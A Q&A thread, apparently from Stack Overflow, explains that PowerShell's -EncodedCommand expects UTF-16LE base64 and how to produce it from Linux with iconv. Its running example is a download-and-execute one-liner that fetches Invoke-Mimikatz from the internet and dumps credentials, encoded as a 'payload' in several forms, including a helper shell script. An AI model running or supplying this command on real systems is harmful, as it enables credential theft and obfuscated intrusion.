
I want to execute base64 encoded commands in powershell. For example, I took a command from this github repo: https://gist.github.com/gfoss/ca6aa37f97fd400ff14f. Running the mimikatz one:

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); $m = Invoke-Mimikatz -DumpCreds; $m

If I run it straight in a powershell prompt, it works correctly. Checking the base64 encoded version, I see that it also works correctly:

powershell -enc …

However, I'm not sure how that string was encoded. If I try to encode it in Linux, I get a different string (I just changed the quotes to prevent bash interpreting the $):

echo -e 'IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1"); $m = Invoke-Mimikatz -DumpCreds; $m' | openssl enc -base64 -A

SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCJodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vUG93ZXJTaGVsbE1hZmlhL1Bvd2VyU3Bsb2l0L21hc3Rlci9FeGZpbHRyYXRpb24vSW52b2tlLU1pbWlrYXR6LnBzMSIpOyAkbSA9IEludm9rZS1NaW1pa2F0eiAtRHVtcENyZWRzOyAkbQo=

This encoding fails when I try to run it with powershell -enc.

What encoding should I use to make the string completely compatible with powershell?

2 Answers


PowerShell expects the base64 string to be Unicode encoded - and Unicode is Windows-lingo for little-endian UTF-16.

You can use iconv to convert to UTF-16LE if you need to encode a PowerShell command from a linux shell without access to .NET:

iconv -f ASCII -t UTF-16LE filename.txt |base64 -w 0

6 Comments

Indeed (+1); to adapt this to providing the string via stdin: printf %s '...' | iconv -t UTF-16LE | base64 -w 0.
iconv -f ASCII -t UTF-16LE <(echo "Write-Host 'wassup!'") |base64 -w 0 if you just want to drop a string in there at the cli
Yes, but there's no advantage to using a process substitution over the pipeline here. Also, avoid echo to prevent problems with behavior variations across shells and strings that start with -. Last but not least: echo appends a trailing newline, which doesn't matter here, but may in other contexts.
P.S.: If an extra trailing newline is not a concern, the simplest solution in bash, ksh, and zsh (but not POSIX-features-only shells such as dash) is to use a here-string: iconv -f ASCII -t UTF-16LE <<<"Write-Host 'wassup!'"
Thanks, this is awesome. I had to use double quotes inside the powershell command and wrap everything in single quotes to prevent the special chars being interpreted by bash (eg $). The final command used to generate the payload was: iconv -f ASCII -t UTF-16LE <<<'IEX (New-Object Net.WebClient).DownloadString(" raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/…); $m = Invoke-Mimikatz -DumpCreds; $m' | base64 -w 0
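The accepted answer in one reusable form, as an added example that is not part of the original answer or the asker's post. It wraps the UTF-16LE step in a shell function, decodes the result back to confirm what PowerShell will see, and shows why the plain UTF-8 base64 from the question is rejected: -EncodedCommand decodes the bytes as UTF-16LE, so every ASCII character must arrive as a "XX 00" pair. It assumes glibc iconv and coreutils base64 are installed; the function names ps_encode, ps_decode and nul_count are my own.

```shell
#!/bin/sh
# Encode a PowerShell one-liner the way powershell.exe -EncodedCommand
# expects it: UTF-16LE bytes, then base64 on a single line.
# printf %s (not echo) avoids a trailing newline and any special handling
# of strings that begin with '-'. tr -d '\n' replaces base64 -w 0 so the
# function also works with base64 builds that lack -w.
ps_encode() {
    printf %s "$1" | iconv -f UTF-8 -t UTF-16LE | base64 | tr -d '\n'
}

# Reverse of ps_encode: decode the base64 and convert UTF-16LE back to
# UTF-8, which is exactly the text PowerShell will execute.
ps_decode() {
    printf %s "$1" | base64 -d | iconv -f UTF-16LE -t UTF-8
}

# Count NUL bytes in the decoded payload. For an ASCII command encoded as
# UTF-16LE this equals the command length; a UTF-8 payload (the failing
# attempt in the question) has none, so PowerShell reads every pair of
# letters as one 16-bit character and the command becomes garbage.
nul_count() {
    printf %s "$1" | base64 -d | od -An -tx1 | tr -s ' ' '\n' | grep -c '^00$'
}

# Constructed input: the command from the question, with double quotes
# inside and single quotes outside so the shell leaves $m alone.
CMD='IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1"); $m = Invoke-Mimikatz -DumpCreds; $m'

GOOD=$(ps_encode "$CMD")
WRONG=$(printf %s "$CMD" | base64 | tr -d '\n')   # UTF-8, as in the question

printf 'UTF-16LE payload : powershell -enc %s\n' "$GOOD"
printf 'NUL bytes in it  : %s (command length %s)\n' "$(nul_count "$GOOD")" "${#CMD}"
printf 'NUL bytes in the UTF-8 version: %s\n' "$(nul_count "$WRONG")"
printf 'Round trip       : %s\n' "$(ps_decode "$GOOD")"
```

`ps_encode dir` yields `ZABpAHIA`, the same string you get from `[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes("dir"))` on Windows. The whole `-enc` argument still has to fit in the Windows command line, so long scripts are better fetched (as the question's command does) than inlined.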

Use one from the PowerShell examples?

[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("command_goes_here"))

3 Comments

But I need to encode it from a Linux box, not natively. I'm guessing it has something to do with the encoding.
Besides, I just tried it and it didn't work that way either. (The code is too long to post it in a reply, but it fails with "The term '=' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. At line:1 char:154")
$ echo -n "your text" | iconv -f UTF8 -t UTF16LE | base64
